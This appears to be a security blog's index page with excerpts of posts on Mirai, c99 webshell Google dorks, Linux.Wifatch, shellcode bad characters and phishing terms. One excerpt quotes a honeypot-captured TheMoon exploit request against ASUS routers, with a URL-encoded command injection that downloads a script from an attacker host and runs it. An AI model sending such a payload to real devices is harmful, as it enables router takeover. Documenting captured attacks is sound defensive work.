Do we need an Internet Policing Force with all power? I can still download malware from a site that was published weeks ago…..

Most of the readers here know that I am not a fan of over policing and abuse of power…etc. However, the internet isn’t under just any one jurisdiction (although just about most people think the USA is that).   There are a lot more sites out there now then ever scanning and posting malicious sites … Read more

Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches

powered by captain crunch security team safe-mode: off (not secure) home basel 2.2 safe-mode: off (not secure) drwxrwxrwx c99memoryl c99shell [file on secure ok ] c99shell v. 1.0 pre-release build #16 hacker uid=99(nobody) gid=99(nobody) groups=99(nobody) –[ c99shell v. 1.0 pre-release build #16 basel c99shell v. 1.0 pre-release build powered by captain crunch security team | … Read more

Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT) ? In today’s technological expansion everything seems to be connected to the Internet, for instance in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected … Read more

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.   POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host:\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ … Read more

What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber

The IEEE is an acronym for the Institute of Electrical and Electronics Engineers. These are a bunch of scientists and students who together are a leading authority in the aerospace, telecommunications, biomedical engineering, electric power, etc. The IEEE consists of more than 365000 members from around the world. The IEEE was formed in 1963 by … Read more

REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?

So last night I did a little banner grabbing from some IP ranges that have been historically extremely insecure, I”m not a blackhat hacker anymore so my intentions weren’t to exploit these hopeless incompetent victims but I would have notified them. I have considered the idea of compromising them just to patch them and save … Read more

Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because … Read more

Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails

What is Phishing? What are malvertising, spam e-mail and malware e-mail campaigns?  These terms have started to become intertwined and used interchangeably which generally means that there is a lack of understanding in the IT community which is typical. Over time laziness and improper training has a way of bending security definitions into bundles. A great example … Read more